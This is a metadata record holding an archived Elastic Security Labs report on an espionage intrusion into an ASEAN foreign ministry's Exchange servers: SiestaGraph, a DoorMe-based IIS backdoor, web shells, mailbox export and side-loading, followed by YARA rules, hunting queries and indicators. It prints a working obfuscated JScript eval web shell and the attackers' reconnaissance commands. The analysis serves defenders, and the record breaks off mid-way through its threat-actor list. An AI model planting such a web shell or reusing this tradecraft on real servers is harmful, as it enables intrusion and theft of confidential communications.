{
	"id": "063155e6-892a-411b-b2b6-45e8ce468f56",
	"created_at": "2026-04-06T00:08:31.169046Z",
	"updated_at": "2026-04-10T13:12:02.666062Z",
	"deleted_at": null,
	"sha1_hash": "667339bc841ad89e550b874079da69e6d7493083",
	"title": "SiestaGraph: New implant uncovered in ASEAN member foreign ministry",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2131337,
	"plain_text": "SiestaGraph: New implant uncovered in ASEAN member foreign\r\nministry\r\nBy Samir Bousseaden, Andrew Pease, Daniel Stepanic, Salim Bitam, Seth Goodwin, Devon Kerr\r\nPublished: 2022-12-16 · Archived: 2026-04-05 18:42:57 UTC\r\nKey takeaways\r\nLikely multiple threat actors are accessing and performing live on-net operations against the Foreign Affairs Office of\r\nan ASEAN member using a likely vulnerable, and internet-connected, Microsoft Exchange server. Once access was\r\nachieved and secured, the mailboxes of targeted individuals were exported.\r\nThreat actors deployed a custom malware backdoor that leverages the Microsoft Graph API for command and\r\ncontrol, which we’re naming SiestaGraph.\r\nA modified version of an IIS backdoor called DoorMe was leveraged with new functionality to allocate shellcode and\r\nload additional implants.\r\nPreamble\r\nIn early December, Elastic Security Labs observed Powershell commands used to collect and export mailboxes from an\r\ninternet-connected Microsoft Exchange server for the Foreign Affairs Office of an Association of Southeast Asian Nations\r\n(ASEAN) member.\r\nIn spite of diverse security instrumentation observed during this activity, the threat actors were able to achieve:\r\nExecution of malware on Exchange Servers, Domain Controllers, and workstations\r\nExfiltration of targeted user and group mailboxes\r\nDeployment of web shells\r\nLateral movement to user workstations\r\nInternal reconnaissance\r\nCollection of Windows credentials\r\nBecause the intrusion is ongoing and covers almost the entire MITRE ATT\u0026CK framework, the analysis sections will use a\r\ntimeline approach.\r\nFor a deep-dive analysis of the SIESTAGRAPH, DOORME, or SHADOWPAD malware families, check out our\r\nfollow-on publication that covers those in detail. 
In addition, there are associations between this campaign and\r\nothers based on other observations and third-party reporting.\r\nUpdated: 2/2/2023\r\nAnalysis\r\nThe investigation, which we’re tracking as REF2924, began with the execution of a Powershell command used to export a\r\nuser mailbox. While this is a normal administrative function, the commands were executed with a process ancestry starting\r\nwith the IIS Worker Process ( w3wp.exe ) as a parent process of cmd.exe , and cmd.exe executing Powershell.\r\nThese events started the investigation that later identified multiple threat actors within the contested network environment.\r\nThe first events observed from this cluster of activity were on November 26, 2022, with the detection of a malicious file\r\nexecution on a Domain Controller. Because of this, it is likely Elastic Defend was deployed post-initial compromise and was\r\ndeployed in “Detect” mode. Throughout our analysis, we observed other security instrumentation tools in the environment\r\nindicating the victim was aware of the intrusion and trying to evict the threat actors.\r\nBecause of the multiple malware samples achieving similar goals, various DLL sideloading observations, and the presence\r\nof a likely internet-connected Exchange server, we believe that there are multiple threat actors or threat groups working\r\nindependently or in tandem with each other.\r\nNovember 26–30, 2022\r\nhttps://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry\r\nPage 1 of 13\n\nMalware execution\r\nThe earliest known evidence of compromise occurred on November 26, 2022, with the execution of a file called\r\nOfficeClient.exe from **C:\\ProgramData\\Microsoft** on a Domain Controller.\r\nTen minutes after OfficeClient.exe was executed on the Domain Controller, another malicious file was executed on another\r\nWindows 2019 server. This file was called Officeclient.exe and executed from **c:\\windows\\pla**. 
On November 28,\r\n2022, officeup.exe was executed on this same Windows 2019 server from **C:\\programdata**.\r\nOn November 29, 2022, the OfficeClient.exe file was executed on an Exchange server as\r\nC:\\ProgramData\\OfficeCore.exe.\r\nAll three of these files ( OfficeClient.exe , Officeclient.exe , and OfficeCore.exe ) have an original PE file name of\r\nwindowss.exe , which is the file name assigned at compile time. We are naming this malware family “SiestaGraph” because\r\nof the long sleep timer and the way that the malware uses the Microsoft Graph API for command and control.\r\nAs of December 8, 2022, we observed a variant of SiestaGraph in VirusTotal, uploaded from the Netherlands on October 14,\r\n2022. SiestaGraph makes use of a .NET API library that functions as an alternative to using Microsoft Graph, which is an\r\nAPI to interact with Microsoft cloud, including Microsoft 365, Windows, and Enterprise Mobility + Security.\r\nInternal reconnaissance\r\nOn November 28, 2022, the threat actor began performing internal reconnaissance by issuing standard commands such as\r\nwhoami , hostname , tasklist , etc. These commands were executed with a process ancestry starting with the IIS Worker\r\nProcess ( w3wp.exe ) as a parent process of cmd.exe , and cmd.exe executing the commands.\r\ncmd.exe /c cd /d C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\themes\\resources\"\u0026who\r\ncmd.exe /c cd /d C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\themes\\resources\"\u0026host\r\ncmd.exe /c cd /d C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\themes\\resources\"\u0026task\r\nAdditional adversary reconnaissance was performed to enumerate local network assets as well as victim assets at embassies\r\nand consulates abroad. 
There has been no indication that this information has been subsequently exploited for additional\r\naccess or information at this time.\r\nOn November 29, 2022, the threat actor began collecting domain user and group information with the net user and net\r\ngroup commands, again issued as child processes of w3wp.exe and cmd.exe. These commands confirmed that this was not\r\nan entirely scripted campaign and that an active operator was involved: the /domain parameter was omitted from two\r\nof the 20 net user commands. While the net user command does not require the /domain parameter, because it was omitted\r\non only two of the 20 occurrences, this was likely an oversight by the operator. This was the first of multiple typographical errors\r\nobserved throughout this campaign.\r\nExample of a typographical error (“yupe” instead of “type”) showing an active operator\r\nExporting Exchange mailboxes\r\nOn November 28, 2022, the threat actor started to export user mailboxes, again using the w3wp.exe process as a parent for\r\ncmd.exe , and finally Powershell. The threat actor added the Microsoft.Exchange.Management.PowerShell.SnapIn\r\nmodule. This module provides the ability to manage Exchange functions using Powershell and was used to export the\r\nmailboxes of targeted Foreign Service Officers and save them as PST files.\r\nAbnormal process spawned from IIS Worker\r\nIn the above example, the Received -gt and Sent -gt dates timebox the collection window as all emails sent and received\r\nafter ( gt is short for “greater than”) November 15, 2022. The timeboxing was not uniform across all mailboxes and\r\nthis process was repeated multiple times. 
Again, in the above example from November 28, 2022, the timebox was for all\r\nsent and received emails from November 15, 2022, to the current date (November 28, 2022); on December 6, 2022, the\r\nmailbox was exported again, this time with a gt value of November 28, 2022, which was the date of the last export.\r\nIn another example in this phase, the threat actors targeted a mailbox called csirt. While this is unconfirmed, “csirt” is\r\ncommonly an acronym for Cyber Security Incident Response Team.\r\nCSIRT mailbox exported\r\nTaking into consideration the timebox used on the csirt export, if this is the industry standard acronym of CSIRT, the\r\nintrusion could have started as early as September 1, 2022, and the threat actors were monitoring the CSIRT to identify if\r\ntheir intrusion had been detected.\r\nThroughout this phase, a total of 24 mailboxes were exported.\r\nOnce the mailboxes were exported, the threat actor created a 7zip archive called 7.tmp with a password of\r\nhuebfkaudfbaksidfabsdf.\r\nCreating password-protected Zip archive\r\nThree of the mailboxes, one of which was the csirt mailbox, were archived individually. These three mailboxes were\r\narchived with a .log.rar or .log file extension.\r\nTargeted mailboxes archived individually (partially obfuscated as two PST files have user initials)\r\nFinally, the threat actor created a 200m 7zip archive called o.7z and added the previously created, password-protected,\r\n7.tmp archive to it.\r\no.7z created from 7.tmp\r\nIIS backdoor module\r\nOn November 28, 2022, we observed the loading of two DLL files, Microsoft.Exchange.Entities.Content.dll and\r\niisrehv.dll through the execution of the iissvcs services using svchost.exe. 
Both Microsoft.Exchange.Entities.Content.dll\r\nand iisrehv.dll were loaded using the iissvcs module of the Windows Service Host through the execution of\r\nC:\\Windows\\system32\\svchost.exe -k iissvcs. These malicious IIS modules are loosely based on the DoorMe IIS backdoor.\r\nDoorMe strings embedded in IIS backdoor module\r\nFor context, IIS is web server software developed by Microsoft and used within the Windows ecosystem to host\r\nwebsites and server-side applications. Starting with version 7.0, Microsoft extended IIS by adding a modular\r\narchitecture that allows individual modules to be added or removed in order to achieve functionality depending on\r\nan environment’s needs. These modules represent individual features that the server can then use to process\r\nincoming requests.\r\nDuring the post-compromise stage, the adversary used the malicious IIS module as a passive backdoor monitoring all\r\nincoming HTTP requests. Depending on a tailor-made request by the operator, the malware will activate and process\r\ncommands. This approach can be challenging for organizations as there is usually low visibility in terms of monitoring and a\r\nlack of prevention capabilities on these types of endpoints. Installing this backdoor requires administrator rights\r\nand placing the module inside the %windir%\\System32\\inetsrv directory. Based on the observed artifacts, we\r\nbelieve initial access was gained through server exploitation during a recent wave of Microsoft Exchange RCE exploit usage.\r\nThe malicious module (C++ DLL) is first loaded through its export, RegisterModule. This function is responsible for setting\r\nup the event handler methods and dynamically resolving API libraries for future usage. 
The main functionality of the backdoor is implemented using the CGlobalModule class under the event handler OnGlobalPreBeginRequest. By overriding\r\nthis event handler, the malware is loaded before a request enters the pipeline. The core functionality of the backdoor all\r\nexists in this function, including cookie validation, parsing commands, and calling underlying command functions.\r\nClass methods including malicious OnGlobalPreBeginRequest method\r\nThe malware implements an authentication mechanism based on a specific cookie name that contains the authentication key.\r\nThis malicious IIS module checks every incoming HTTP request for the specified cookie name, and it returns a success\r\nmessage in case of a GET request. The GET request is used as a way for the operator to test the backdoor’s status, and it also\r\nreturns the username and hostname of the impacted machine. Commands can be passed to the backdoor through POST\r\nrequests as data.\r\nGET HTTP request with the authentication cookie\r\nThroughout our analysis, we discovered older samples on VirusTotal relating to this backdoor. Although they have the same\r\nauthentication and logic, they implement different functionalities. 
The cookie name used for authentication was also\r\nchanged alongside the handled commands.\r\nThis observed backdoor implements four different commands, and the symbol PIPE is used to separate the command ID and\r\nits arguments.\r\nID | Parameter | Description\r\n0x42 | Expects the string GenBeaconOptions | Generates a unique Globally Unique Identifier used to identify the infected machine and sends it to the attacker\r\n0x43 | Shellcode blob | Executes the shellcode blob passed as a parameter in the current process\r\n0x44 | N/A | Writes to and reads from a specified named pipe\r\n0x63 | Shellcode blob in chunks | Similar to command ID 0x43, but receives the shellcode blob in chunks and acts on it once fully received\r\nFrom our analysis, it appears that this simplistic backdoor is used as a stage loader. It uses NT Windows APIs, mainly\r\nNtAllocateVirtualMemory , NtProtectVirtualMemory , and NtCreateThreadEx , to allocate the required shellcode\r\nmemory and to create the executing thread.\r\nkk2.exe\r\nOn November 30, 2022, an unknown binary called kk2.exe was executed on an Exchange server. While we have been\r\nunable to collect kk2.exe as of this writing, we can see that it was used to load a vulnerable driver that can be used to\r\nmonitor and terminate processes from kernel mode, mhyprot.sys. 
It is unclear whether mhyprot.sys is downloaded by, or embedded\r\ninto, kk2.exe.\r\nkk2.exe loading the vulnerable mhyprot.sys driver\r\nmhyprot.sys was detected by Elastic’s open-source Windows.VulnDriver.Mhyprot YARA rule, released in August 2022.\r\nFor more information on how vulnerable drivers are used for intrusions, check out the Stopping Vulnerable Driver\r\nAttacks research Joe Desimone published in September 2022.\r\nAs stated previously, we could not collect kk2.exe for analysis, but it is likely that it used mhyprot.sys to escalate to kernel\r\nmode as a way to monitor, and if necessary, terminate processes. This could be used as a way of protecting an implant, or\r\nthe entire intrusion, from detection.\r\nWeb shells\r\nThe following section highlights multiple attempts by the threat actors to install a web shell as a back door into the\r\nenvironment if they are evicted. While speculative in nature, it appears that most of these attempts to load web shells failed.\r\nIt is unclear what the reasons for the failures are. 
We’ll not cover every attempt at loading a web shell, as several of them\r\nwere very similar, but we’ll highlight the shifts in approaches.\r\nThe first attempt was to use the Microsoft certutil tool to download an Active Server Pages (ASPX) file ( config.aspx )\r\nfrom a remote host (185.239.70[.]229) and save it as the error.aspx page on the Exchange Control Panel’s webserver.\r\nBecause this IP address is a known Cobalt Strike server, it may have been blocked by network defense architecture, leading\r\nto further attempts to overwrite error.aspx.\r\nAttempt to overwrite error.aspx with config.aspx from a known Cobalt Strike server\r\nAfter attempting to use config.aspx from a Cobalt Strike C2 server, the threat actors attempted to insert Base64 encoded\r\nJavascript into a text file ( 1.txt ), use certutil to decode the Base64 encoded Javascript ( 2.aspx ), and then overwrite\r\nerror.aspx with 2.aspx. This was attempted on both the Exchange Control Panel and Outlook Web Access web servers.\r\nAttempt to overwrite error.aspx with Javascript file\r\nThe Base64 encoded string decoded into the following Javascript:\r\n\u003c%@ Page Language=\"Jscript\" Debug=true%\u003e\r\n\u003c%\r\nvar TNKY='nHsXLMPUSCABolxOgKWuIFeGVimhEjyzQrTvRcwafZdJDktqYpbN';\r\nvar ZZXG=Request.Form(\"daad\");\r\nvar VAXN=TNKY(7) + TNKY(0) + TNKY(2) + TNKY(10) + TNKY(21) + TNKY(22);\r\neval(ZZXG, VAXN);\r\n%\u003e\r\nThe preceding code is a simple web shell leveraging the eval method to evaluate JScript code sent through the POST\r\nparameter daad. Variations of this technique were attempted multiple times. 
Other attempts were observed to load\r\nobfuscated versions of the China Chopper and Godzilla web shells.\r\nDecember 1–4, 2022\r\nDLL side-loading\r\nOn December 2, 2022, on two Domain Controllers, we observed a new DLL ( log.dll ) being side loaded by a legitimate but\r\n11-year-old version of the Bitdefender Crash Handler executable (compiled name: BDReinit.exe ), 13802 AR.exe. Once\r\nexecuted, it will move to the **C:\\ProgramData\\OfficeDriver** directory, rename itself **svchost.exe** , and install itself\r\nas a service.\r\nOnce log.dll is loaded, it spawns the Microsoft Windows Media Player ( wmplayer.exe ) and dllhost.exe and injects into\r\nthem, which triggers a memory shellcode detection.\r\nUpdated 2/2/2023: In our updated research into SIESTAGRAPH, DOORME, and SHADOWPAD, we identify log.dll as\r\npart of the SHADOWPAD malware family.\r\nOn December 2, 2022, another unknown DLL, Loader.any , was interactively executed with an Administrative account\r\nusing rundll32.exe. Loader.any was observed executing two times on a Domain Controller and was then deleted\r\ninteractively.\r\nOn December 3, 2022, we observed another malicious file, APerfectDayBase.dll. While this is a known malicious file, its\r\nexecution was not observed. APerfectDayBase.dll is the legitimate name of a DLL in the import table of a benign-looking\r\nprogram, AlarmClock.exe.\r\nImport table for AlarmClock.exe\r\nThis naming appears to be an attempt to make the malicious DLL look legitimate and likely to leverage AlarmClock.exe as\r\na side-loading target. Testing has confirmed that the DLL can be side-loaded with AlarmClock.exe. 
While not malicious,\r\nwe are including the hash for AlarmClock.exe in the Indicators table as it could be used purely as a side-loading\r\nvehicle for the malicious DLL, APerfectDayBase.dll.\r\nVictimology and targeting motivations\r\nDiamond model\r\nElastic Security utilizes the Diamond Model to describe high-level relationships between the adversaries, capabilities,\r\ninfrastructure, and victims of intrusions. While the Diamond Model is most commonly used with single intrusions, and\r\nleveraging Activity Threading (section 8) as a way to create relationships between incidents, an adversary-centered (section\r\n7.1.4) approach allows for a single, although cluttered, diamond.\r\nREF2924 diamond model\r\nVictimology\r\nThe victim is the foreign ministry of a nation in Southeast Asia. The threat actor appeared to focus priority intelligence\r\ncollection efforts on personnel and positions of authority related to the victim's relationship with ASEAN (Association of\r\nSoutheast Asian Nations).\r\nASEAN is a regional partnership union founded in 1967 to promote intergovernmental cooperation among member states.\r\nThis has been expressed through economic, security, trade, and educational cooperation with expanding international and\r\ndomestic significance for partner nations. The union itself has expanded to 10 member countries with 2 more currently\r\nseeking accession. 
It is exerting this international influence over the development of a Regional Comprehensive Economic\r\nPartnership trade agreement with a broader periphery of member nations (16 members and 2 applicants).\r\nASEAN and RCEP member countries\r\nBelow is a list of the targeted users, the collection window(s) in which their mailboxes were exported, and the date(s) their\r\nmailboxes were exported.\r\nUser | Collection Window | Collection Date(s)\r\nUser 1 | 11/1/2022 - 11/28/2022; 11/29/2022 - 12/6/2022 | 11/28/2022; 12/6/2022\r\nUser 2 | 11/1/2022 - 11/28/2022 | 11/28/2022\r\nUser 3 | 11/1/2022 - 11/28/2022 | 11/28/2022\r\nUser 4 | 11/15/2022 - 11/28/2022 | 11/28/2022\r\nUser 5 | 11/15/2022 - 11/28/2022; 11/29/2022 - 12/6/2022 | 11/28/2022; 12/6/2022\r\nUser 6 | 11/15/2022 - 11/28/2022 | 11/28/2022\r\nUser 7 | 11/15/2022 - 11/28/2022; 11/29/2022 - 12/6/2022 | 11/28/2022; 12/6/2022\r\nUser 8 | 11/15/2022 - 11/28/2022 | 11/28/2022\r\nUser 9 | 11/15/2022 - 11/28/2022 | 11/28/2022\r\nUser 10 | 9/15/2022 - 11/29/2022 | 11/29/2022\r\nUser 11 | 9/15/2022 - 11/29/2022 | 11/29/2022\r\nUser 12 | 9/15/2022 - 11/29/2022 | 11/29/2022\r\nUser 13 | 9/1/2022 - 11/30/2022 | 11/30/2022\r\nUser 14 | 9/1/2022 - 11/30/2022 | 11/30/2022\r\nUser 15 | 11/29/2022 - 12/6/2022 | 12/6/2022\r\nUser 16 | 11/29/2022 - 12/6/2022 | 12/6/2022\r\nUser 17 | 11/29/2022 - 12/6/2022 | 12/6/2022\r\nUser 18 | 11/29/2022 - 12/6/2022 | 12/6/2022\r\nUser 19 | 11/29/2022 - 12/6/2022 | 12/6/2022\r\nUser 20 | 11/29/2022 - 12/6/2022 | 12/6/2022\r\nUser 21 | 11/29/2022 - 12/6/2022 | 12/6/2022\r\nUser 22 | 11/29/2022 - 12/6/2022 | 12/6/2022\r\nUser 23 | 11/29/2022 - 12/6/2022 | 12/6/2022\r\nUser 24 | 11/29/2022 - 12/6/2022 | 12/6/2022\r\nAs reflected above, we observed Users 1, 5, and 7 targeted twice each, indicating that the contents of their mailboxes were of\r\nparticular interest. 
This could be the result of pre-intrusion reconnaissance, or the threat actor may have decided to continue collecting on\r\nthose users once the initial tranche of mailboxes was reviewed.\r\nTargeting motivation\r\nThere is no indication this victim would provide any direct monetary benefit to an adversary. The attack appears to be\r\nmotivated by diplomatic intelligence gathering. There are a number of potential adversaries who would find a\r\nnation’s confidential diplomatic communications related to ASEAN, and by extension the RCEP, to be highly advantageous\r\nin furthering their own regional influence, national security, and domestic goals.\r\nIf the threat actor is excluded from ASEAN trade unions and depends on foreign aid from members of those trade unions, it\r\ncould find confidential diplomatic information specifically related to ASEAN useful for negotiating or renegotiating trade\r\nagreements.\r\nASEAN member nations are rival claimants to territorial disputes in the South China Sea (SCS). ASEAN as an organization\r\nhas not produced a unified front in the SCS dispute, with some members preferring direct nation-to-nation negotiations and\r\nsome wanting ASEAN to negotiate as a whole. Diplomatic information from ASEAN member nations might provide the\r\nthreat actor with useful information to influence decisions and negotiations around the SCS. 
The threat actor's interest in\r\nASEAN and any individual member would almost certainly be multifaceted, covering government functions from\r\nimmigration to agriculture, to technology, to sociopolitical considerations such as human rights.\r\nDetection logic\r\nPrevention rules\r\nPotential Masquerading as SVCHOST\r\nBinary Masquerading via Untrusted Path\r\nProcess Execution from an Unusual Directory\r\nDetection rules\r\nPotential Credential Access via DCSync\r\nWindows Service Installed via an Unusual Client\r\nSuspicious Microsoft IIS Worker Descendant\r\nEncrypting Files with WinRar or 7z\r\nExporting Exchange Mailbox via PowerShell\r\nWindows Network Enumeration\r\nNTDS or SAM Database File Copied\r\nSuspicious CertUtil Commands\r\nHunting queries\r\nThe events for both KQL and EQL are provided with the Elastic Agent using the Elastic Defend integration. Hunting queries\r\ncould return a high volume of signals or false positives. 
These queries are used to identify potentially suspicious behavior, but an\r\ninvestigation is required to validate the findings.\r\nKQL query\r\nUsing the Discover app in Kibana, the below query will identify loaded IIS modules that have been identified as malicious\r\nby Elastic Defend (even if Elastic Defend is in “Detect Only” mode).\r\nThe leading and trailing wildcards (*) can make this an expensive search over a large number of events.\r\nevent.code : \"malicious_file\" and event.action : \"load\" and process.name : \"w3wp.exe\" and process.command_line.wildcard :\r\nEQL queries\r\nUsing the Timeline section of the Security Solution in Kibana under the “Correlation” tab, you can use the below EQL\r\nqueries to hunt for behaviors similar to the SiestaGraph backdoor and the observed DLL side-loading patterns.\r\n# Hunt for DLL Sideloading using the observed DLLs:\r\nlibrary where\r\n dll.code_signature.exists == false and\r\n process.code_signature.trusted == true and\r\n dll.name : (\"log.dll\", \"APerfectDayBase.dll\") and\r\n process.executable :\r\n (\"?:\\\\Windows\\\\Tasks\\\\*\",\r\n \"?:\\\\Users\\\\*\",\r\n \"?:\\\\ProgramData\\\\*\")\r\n# Hunt for scheduled task or service from a suspicious path:\r\nprocess where event.type == \"start\" and\r\n process.executable : (\"?:\\\\Windows\\\\Tasks\\\\*\", \"?:\\\\Users\\\\Public\\\\*\", \"?:\\\\ProgramData\\\\Microsoft\\\\*\") and\r\n (process.parent.args : \"Schedule\" or process.parent.name : \"services.exe\")\r\n# Hunt for the SiestaGraph compiled file name and running as a scheduled task:\r\nprocess where event.type == \"start\" and\r\n process.pe.original_file_name : \"windowss.exe\" and not process.name : \"windowss.exe\" and process.parent.args : \"Schedule\"\r\n# Hunt for unsigned executable using Microsoft Graph API:\r\nnetwork where event.action == \"lookup_result\" and\r\n 
dns.question.name : \"graph.microsoft.com\" and process.code_signature.exists == false\r\nYARA\r\nElastic Security has created YARA rules to identify this activity. Below are YARA rules to identify the SiestaGraph malware\r\nimplant and the DoorMe IIS backdoor.\r\nrule Windows_Trojan_DoorMe {\r\n meta:\r\n author = \"Elastic Security\"\r\n creation_date = \"2022-12-09\"\r\n last_modified = \"2022-12-15\"\r\n os = \"Windows\"\r\n arch = \"x86\"\r\n category_type = \"Trojan\"\r\n family = \"DoorMe\"\r\n threat_name = \"Windows.Trojan.DoorMe\"\r\n reference_sample = \"96b226e1dcfb8ea2155c2fa508125472c8c767569d009a881ab4c39453e4fe7f\"\r\n strings:\r\n $seq_aes_crypto = { 8B 6C 24 ?? C1 E5 ?? 8B 5C 24 ?? 8D 34 9D ?? ?? ?? ?? 0F B6 04 31 32 44 24 ?? 88 04 29 8D 04 9\r\n $seq_copy_str = { 48 8B 44 24 ?? 48 89 58 ?? 48 89 F1 4C 89 F2 49 89 D8 E8 ?? ?? ?? ?? C6 04 1E ?? }\r\n $seq_md5 = { 89 F8 44 21 C8 44 89 C9 F7 D1 21 F1 44 01 C0 01 C8 44 8B AC 24 ?? ?? ?? ?? 8B 9C 24 ?? ?? ?? ?? 48 89\r\n $seq_calc_key = { 31 FF 48 8D 1D ?? ?? ?? ?? 48 83 FF ?? 4C 89 F8 77 ?? 41 0F B6 34 3E 48 89 F1 48 C1 E9 ?? 44 0F\r\n $seq_base64 = { 8A 45 ?? 8A 4D ?? C0 E0 ?? 89 CA C0 EA ?? 80 E2 ?? 08 C2 88 55 ?? C0 E1 ?? 8A 45 ?? C0 E8 ?? 
24 ??\r\n $str_0 = \".?AVDoorme@@\" ascii fullword\r\n condition:\r\n 3 of ($seq*) or 1 of ($str*)\r\n}\r\nrule Windows_Trojan_SiestaGraph {\r\n meta:\r\n author = \"Elastic Security\"\r\n creation_date = \"2022-12-14\"\r\n last_modified = \"2022-12-15\"\r\n os = \"Windows\"\r\n arch = \"x86\"\r\n category_type = \"Trojan\"\r\n family = \"SiestaGraph\"\r\n threat_name = \"Windows.Trojan.SiestaGraph\"\r\n reference_sample = \"50c2f1bb99d742d8ae0ad7c049362b0e62d2d219b610dcf25ba50c303ccfef54\"\r\n strings:\r\n $a1 = \"downloadAsync\" ascii nocase fullword\r\n $a2 = \"UploadxAsync\" ascii nocase fullword\r\n $a3 = \"GetAllDriveRootChildren\" ascii fullword\r\n $a4 = \"GetDriveRoot\" ascii fullword\r\n $a5 = \"sendsession\" wide fullword\r\n $b1 = \"ListDrives\" wide fullword\r\n $b2 = \"Del OK\" wide fullword\r\n $b3 = \"createEmailDraft\" ascii fullword\r\n $b4 = \"delMail\" ascii fullword\r\n condition:\r\n all of ($a*) and 2 of ($b*)\r\n}\r\nObserved adversary tactics and techniques\r\nElastic uses the MITRE ATT\u0026CK framework to document common tactics, techniques, and procedures that advanced\r\npersistent threats use against enterprise networks.\r\nTactics\r\nTactics represent the why of a technique or sub-technique. 
It is the adversary’s tactical goal: the reason for performing an\r\naction.\r\nReconnaissance\r\nInitial access\r\nExecution\r\nPersistence\r\nDefense evasion\r\nCredential access\r\nDiscovery\r\nLateral movement\r\nCollection\r\nCommand and control\r\nTechniques / Sub techniques\r\nTechniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.\r\nGather host information\r\nGather victim information\r\nGather victim network information\r\nGather victim org information\r\nExploit public-facing application\r\nCommand and Scripting Interpreter: Windows command-shell\r\nCommand and Scripting Interpreter: Powershell\r\nNetwork share discovery\r\nRemote system discovery\r\nFile and directory discovery\r\nProcess discovery\r\nRemote services: SMB/Windows admin shares\r\nSystem service discovery\r\nSystem owner/user discovery\r\nHijack execution flow: DLL side-loading\r\nMasquerading: Masquerade task or service\r\nProcess injection\r\nIndicator removal: File deletion\r\nDeobfuscate/decode files or information\r\nVirtualization/sandbox evasion: Time based Evasion\r\nOS credential dumping: NTDS\r\nOS credential dumping: Security Account Manager\r\nOS credential dumping: DCSync\r\nCreate or modify system process: Windows service\r\nScheduled task/job: Scheduled task\r\nValid accounts\r\nServer software component: IIS components\r\nServer software component: Web shell\r\nEmail collection: Local email collection\r\nArchive collected data: Archive via utility\r\nScreen capture\r\nWeb service\r\nApplication layer protocol: Web protocols\r\nReferences\r\nhttps://malpedia.caad.fkie.fraunhofer.de/details/win.doorme\r\nhttps://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks\r\nhttps://threatfox.abuse.ch/ioc/1023850/\r\nhttps://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry\r\nPage 12 of 
13\n\nhttps://malpedia.caad.fkie.fraunhofer.de/details/win.chinachopper\r\nhttps://malpedia.caad.fkie.fraunhofer.de/details/jsp.godzilla_webshell\r\nhttps://github.com/tennc/webshell/blob/master/Godzilla/123.ashx\r\nObservables\r\nAll observables are also available for download in both ECS and STIX format in a combined zip bundle.\r\nThe following observables were discussed in this research.\r\nIndicator Type Name Refere\r\n1a87e1b41341ad042711faa0c601e7b238a47fa647c325f66b1c8c7b313c8bdf\r\nSHA-256\r\nOfficeClient.exe and OfficeCore.exe SIESTA\r\n7fc54a287c08cde70fe860f7c65ff71ade24dfeedafdfea62a8a6ee57cc91950\r\nSHA-256\r\nOfficeclient.exe SIESTA\r\nf9b2b3f7ee55014cc8ad696263b24a21ebd3a043ed1255ac4ab6a63ad4851094\r\nSHA-256\r\nofficeup.exe SIESTA\r\nc283ceb230c6796d8c4d180d51f30e764ec82cfca0dfaa80ee17bb4fdf89c3e0\r\nSHA-256 Microsoft.Exchange.Entities.Content.dll DOOR\r\n4b7d244883c762c52a0632b186562ece7324881a8e593418262243a5d86a274d\r\nSHA-256\r\niisrehv.dll Session\r\n54f969ce5c4be11df293db600df57debcb0bf27ecad38ba60d0e44d4439c39b6\r\nSHA-256\r\nkk2.exe mhypro\r\n509628b6d16d2428031311d7bd2add8d5f5160e9ecc0cd909f1e82bbbb3234d6\r\nSHA-256\r\nmhyprot.sys vulnera\r\n386eb7aa33c76ce671d6685f79512597f1fab28ea46c8ec7d89e58340081e2bd\r\nSHA-256\r\n13802 AR.exeBDReinit.exe\r\nvulnera\r\nBitdefe\r\nHandle\r\n452b08d6d2aa673fb6ccc4af6cebdcb12b5df8722f4d70d1c3491479e7b39c05\r\nSHA-256\r\nlog.dll SHAD\r\n5be0045a2c86c38714ada4084080210ced8bc5b6865aef1cca658b263ff696dc\r\nSHA-256\r\nAPerfectDayBase.dll\r\nmalicio\r\ninjecte\r\nvulnera\r\n3f5377590689bd19c8dd0a9d46f30856c90d4ee1c03a68385973188b44cc9ab7\r\nSHA-256\r\nAlarmClock.exe\r\nbenign\r\nfor 
side\r\nAPerfe\r\nf2a9ee6dd4d1ceb4d97138755c919549549311c06859f236fc8655cf38fe5653\r\nSHA-256\r\nLoader.any\r\ncurrent\r\nDLL\r\n3b41c46824b78263d11b1c8d39cfe8c0e140f27c20612d954b133ffb110d206a\r\nSHA-256\r\nLoader.any\r\ncurrent\r\nDLL\r\n9b66cd1a80727882cfa1303ada37019086c882c9543b3f957ee3906440dc8276\r\nSHA-256\r\nClass1.exe\r\ncurrent\r\nfile\r\n185.239.70.229 ipv4 na Cobalt\r\nSource: https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry\r\nhttps://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry"
	],
	"report_names": [
		"siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry"
	],
	"threat_actors": [
		{
			"id": "f9fa9633-dfd1-458d-84ce-cc36dcdc7ce4",
			"created_at": "2022-10-25T16:07:24.188897Z",
			"updated_at": "2026-04-10T02:00:04.894484Z",
			"deleted_at": null,
			"main_name": "Siesta",
			"aliases": [],
			"source_name": "ETDA:Siesta",
			"tools": [
				"Chymine",
				"Darkmoon",
				"Gen:Trojan.Heur.PT",
				"Poison Ivy",
				"SPIVY",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f9bb42e1-65d6-444e-8c63-21c2605b49e0",
			"created_at": "2023-01-06T13:46:38.887429Z",
			"updated_at": "2026-04-10T02:00:03.133382Z",
			"deleted_at": null,
			"main_name": "Siesta",
			"aliases": [],
			"source_name": "MISPGALAXY:Siesta",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "2864e40a-f233-4618-ac61-b03760a41cbb",
			"created_at": "2023-12-01T02:02:34.272108Z",
			"updated_at": "2026-04-10T02:00:04.97558Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "ETDA:WildCard",
			"tools": [
				"RustDown",
				"SysJoker"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
